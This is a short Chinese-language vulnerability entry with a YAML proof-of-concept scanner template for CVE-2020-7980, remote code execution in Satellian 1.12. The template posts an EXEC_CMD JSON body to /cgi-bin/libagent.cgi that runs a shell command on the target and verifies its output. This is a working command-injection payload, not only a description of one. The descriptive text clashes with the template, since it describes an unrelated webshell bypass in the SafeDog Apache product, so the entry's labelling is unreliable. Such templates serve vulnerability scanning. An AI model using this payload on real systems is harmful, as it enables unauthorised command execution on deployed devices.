漏洞描述
厦门服云信息科技有限公司网站安全狗APACHE版存在webshell绕过漏洞,攻击者可以利用漏洞绕过网站安全狗获取服务器权限。
fofa: "Satellian"
CVE-2020-7980: Satellian 1.12 Remote Code Execution
PoC代码[已公开]
id: CVE-2020-7980
info:
name: Satellian 1.12 Remote Code Execution
author: JingLing
severity: critical
description: |-
厦门服云信息科技有限公司网站安全狗APACHE版存在webshell绕过漏洞,攻击者可以利用漏洞绕过网站安全狗获取服务器权限。
fofa: "Satellian"
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7980
tags: cve,cve2020,satellian,rce
created: 2023/08/17
set:
r1: randomInt(800000000, 1000000000)
r2: randomInt(800000000, 1000000000)
rules:
r0:
request:
method: POST
path: /cgi-bin/libagent.cgi?type=J
headers:
Content-Type: application/json
Cookie: ctr_t=0; sid=123456789
body: '{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "expr {{r1}} + {{r2}}", "F": "EXEC_CMD"}, "V_": 1}'
follow_redirects: true
expression: response.body.bcontains(bytes(string(r1 + r2)))
expression: r0()